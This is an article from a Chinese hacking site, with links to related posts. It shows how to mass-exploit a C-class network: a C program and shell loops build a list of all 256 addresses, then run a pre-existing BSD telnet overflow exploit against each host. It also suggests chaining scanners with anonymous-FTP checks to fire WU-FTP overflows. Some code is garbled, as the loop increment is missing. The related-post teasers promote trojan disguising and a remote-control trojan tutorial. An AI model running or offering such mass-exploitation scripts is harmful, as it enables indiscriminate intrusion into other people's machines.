关于扫描的技巧与实战

所属分类: 网络安全 / 工具使用 阅读数: 180
收藏 0 赞 0 分享
面我们就以一个简单的扫描一个C类IP里BSDTELNET漏洞机器为例子来看看:$cat num.cmain(){ int x; for (x=0;x<256;x ) printf ("%d\n",x);}上面这段C我想不用我多说了吧,他生成一个C类网的网络号,大家在编译后可以./num >>num.txt来得到这个文本.#!/bin/sh echo -n "please ernter a ip:" read ipip list=`cat num.txt` for listip in $list do echo $ipip.$listipecho >>iplist.txt $ipip.$listip done上面这段我们来说说,read ipip是接受键盘的信息,用来给你输入1.1.1这样一个C段地址以便与下面的LISTIP合并成真正的ip,list='cat num.txt'是读取我们刚才生成的num.txt里1-254的网络号,for listip in $list是把刚才list里的num.txt内容循环读给listip,然后我们用echo $ipip.$listip就可以得到一个真正的ip了,再通过echo >>iplist.txt $ipip.$listip把最后得到的IP写到iplist.txt.通过以上步骤,我们得到了一个c类ip,下面我们就来用我们事先就有的bsdtelnet溢出代码来扫描他们了,如下:#!/bin/sh list=`cat iplist.txt` for listip in $list do ./bsdtelnet -c $listipdonelist='cat iplist.txt'读取刚才我们生成的iplist.txt文本,for listip in $list把list里存放的ip循环送给listip, 看这个./bsdtelnet -c $listip,这个就是调用我们在当前这个SHELL所在的目录执行我们的exploit来对ip进行探测.全部结束,好了,细心的朋友可能发现了,这样的扫描似乎很慢,呵呵,确实,因为这样他不管23端口有没有开,不管对方机器是不是BSD的,他都要去溢出试试,在这里,我只是通过TOMYCHEN兄提供给大家一个巧妙利用SHELL的思路,具体大家可以自己发挥,比如先在SHELL里调用扫描器扫描,然后把开放有21端口的机器保存下面,然后再对开了21端口的机器进行验证看是否可匿名,得到会话返回消息,如果是WU-FTP260等,就可以再调用溢出程序进行测试呀等等.还是那句老话,技术最重要!----------------------------------------------- 作者:SysHunter
更多精彩内容其他人还在看

如何给你的木马换一个图标 (原创)

我也不费话了因为没有工夫所以只是简单的写了一下 希望学会! 准备工具: 1. 黑洞2001(也可以用别的) 2. 文件捆绑机exe2to1(黑洞作者的新作品) 3. 窃图精灵1.0 4. noskynet 或黑毒克星 注意这些软件到我的网站都可以下载到! 好了!下载完了这些工具我
收藏 0 赞 0 分享

木马病毒的通用解法

由于很多新手对安全问题了解不多,所以并不知道自己的计算机中了“木马”该怎么样清除。虽然现在市面上有很多新版杀毒软件都可以自动清除“木马”,但它们并不能防范新出现的“木马”程序,因此最关键的还是要知道“木马”的工作原理,这样就会很容易发现“木马”。相
收藏 0 赞 0 分享

SoftICE for WIN95中文命令解说(十五)

SoftICE for WIN95中文命令解说(十五) Copyright (c) 1999 http://coobe.cs.hn.cninfo.net/~tianwei 命令: WL 作用: 打开或关闭本地窗口;设置本地窗口的大小 语法: WL [window-size] 用法
收藏 0 赞 0 分享

黑洞2001正式版使用教程

黑洞2001正式版使用教程 黑洞2001是陈经韬2001年的作品,用于远程控制,是一匹不错的木马,功能比较强大但是有一部分功能因为涉及安全问题所以被去掉了,不过这没有关系,读完了这篇教程你就会完全掌握用黑洞2001掌握远程主机的控制权。这篇教程的攻击性极大,所以只供
收藏 0 赞 0 分享

SoftICE for WIN95中文命令解说(十四)

SoftICE for WIN95中文命令解说(十四) Copyright (c) 1999 http://coobe.cs.hn.cninfo.net/~tianwei 命令: VER 作用: 显示SoftICE版本号 语法: VER 用法: 用Loader32的
收藏 0 赞 0 分享

Nmap备忘单:从探索到漏洞利用 第二章 MITM

这是我们的第二期NMAP备忘单,基本上,我们将讨论一些高级NMAP扫描的技术,我们将进行一个中间人攻击(MITM)。现在,游戏开始了
收藏 0 赞 0 分享

Docker构建Web渗透测试工具容器

使用Docker容器,我们可以根据需要创建渗透测试环境或者审计环境。我们也可以将容器作为证据的一部分向客户展示,或者将容器交给客户让他们进行审计
收藏 0 赞 0 分享

隐藏在Windows XP中的28个秘密武器

Windows XP现在大家都在用了,不过,隐藏在它其中的秘密武器可不是人人都找得到,下面就让我带大家来寻找Win XP中的28个秘密武器。  1、免费的系统教程(system32文件夹下)  安装完windows xp后很想马上学习并体验一下它的魅力吗?我们无需再东奔西走去 找
收藏 0 赞 0 分享

初级黑客教学

各位老大//// 本文纯属个人见解 //// 如有不满竟请见谅 qq :249395079 emil:lovewxll@eyou.com1. 扫端口(port) port是一个很重要的东西,如果你知道他所有有开的port的话,那你就可以从某个port开始hackin
收藏 0 赞 0 分享

Telnet的命令模式

除了在Telnet是如何工作的例子介绍的以外,Telnet还有很多的特点。Telnet可发送除了"escape"的任何字符到远程主机上。因为"escape"字符在Telnet中是客户机的一个特殊的命令模式,它的默认值是"Ctrl-
收藏 0 赞 0 分享
查看更多